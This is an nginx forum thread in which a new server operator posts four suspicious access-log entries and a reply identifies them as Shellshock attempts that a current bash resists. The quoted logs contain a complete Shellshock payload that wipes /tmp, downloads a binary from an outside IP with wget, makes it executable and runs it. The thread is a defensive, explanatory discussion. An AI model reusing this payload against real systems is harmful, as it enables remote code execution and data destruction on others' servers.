Welcome! Log In Create A New Profile

Advanced

Re: Suspicious log records

Previous Message Next Message
Forum List Message List New Topic Print View
Robert Paprocki
October 22, 2016 12:58PM
Looks like a shellshock attempt. Provided that you're running a modern of version of bash there's nothing to be done. Well, you could drop requests from those IPs if you see fit.

Welcome to the wild world of running a public server!

> On Oct 22, 2016, at 03:19, janro <nginx-forum@forum.nginx.org> wrote:
>
> Hi everyone.
>
> I'm newbie with Nginx and with servers and I thought to ask your opinion
> about the log input I noticed from last night.
>
> There's clearly a some sort of malicious attempt in access.log which is
> repeated four times. In error.log there's only 'closed keepalive connection'
> records, which matches with those four attempts.
>
> Everything runs fine on server side. I just like to know that is this just a
> normal day in a world of server logs or something critical that need
> actions?
>
> Access.log
>
> 61.147.247.161 - - [22/Oct/2016:00:10:14 +0300] "GET / HTTP/1.1" 301 184 "()
> { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1
> -O /tmp/China.Z-axgfh >> /tmp/Run.sh;echo echo By China.Z >>
> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-axgfh >> /tmp/Run.sh;echo
> /tmp/China.Z-axgfh >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c
> \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O
> /tmp/China.Z-axgfh >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo
> chmod 777 /tmp/China.Z-axgfh >> /tmp/Run.sh;echo /tmp/China.Z-axgfh >>
> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777
> /tmp/Run.sh;/tmp/Run.sh\x22" "-"
>
> 61.147.247.161 - - [22/Oct/2016:00:11:08 +0300] "GET / HTTP/1.1" 301 184 "()
> { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1
> -O /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo echo By China.Z >>
> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo
> /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c
> \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O
> /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo echo By China.Z >>
> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo
> /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "-"
>
> 61.147.247.161 - - [22/Oct/2016:00:12:28 +0300] "GET / HTTP/1.1" 301 184 "()
> { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1
> -O /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo echo By China.Z >>
> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo
> /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c
> \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O
> /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo echo By China.Z >>
> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo
> /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "-"
>
> 61.147.247.161 - - [22/Oct/2016:00:13:29 +0300] "GET / HTTP/1.1" 301 184 "()
> { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1
> -O /tmp/China.Z-xxmb >> /tmp/Run.sh;echo echo By China.Z >>
> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-xxmb >> /tmp/Run.sh;echo
> /tmp/China.Z-xxmb >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c
> \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O /tmp/China.Z-xxmb
>>> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777
> /tmp/China.Z-xxmb >> /tmp/Run.sh;echo /tmp/China.Z-xxmb >>
> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777
> /tmp/Run.sh;/tmp/Run.sh\x22" "-"
>
> Error.log
>
> 2016/10/22 00:10:15 [info] 1751#0: *27218 client 61.147.247.161 closed
> keepalive connection
> 2016/10/22 00:11:09 [info] 1751#0: *27219 client 61.147.247.161 closed
> keepalive connection
> 2016/10/22 00:12:29 [info] 1751#0: *27220 client 61.147.247.161 closed
> keepalive connection
> 2016/10/22 00:13:29 [info] 1751#0: *27221 client 61.147.247.161 closed
> keepalive connection
>
> Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270472,270472#msg-270472
>
> _______________________________________________
> nginx mailing list
> nginx@nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx

_______________________________________________
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx
Reply Quote
RSS
Subject Author Posted

Suspicious log records

janro October 22, 2016 06:19AM

Re: Suspicious log records

Robert Paprocki October 22, 2016 12:58PM

Re: Suspicious log records

janro October 22, 2016 04:21PM



Sorry, only registered users may post in this forum.

Click here to login

Online Users

Guests: 177
Record Number of Users: 8 on April 13, 2023
Record Number of Guests: 421 on December 02, 2018
Powered by nginx      Powered by FreeBSD      PHP Powered      Powered by MariaDB      ipv6 ready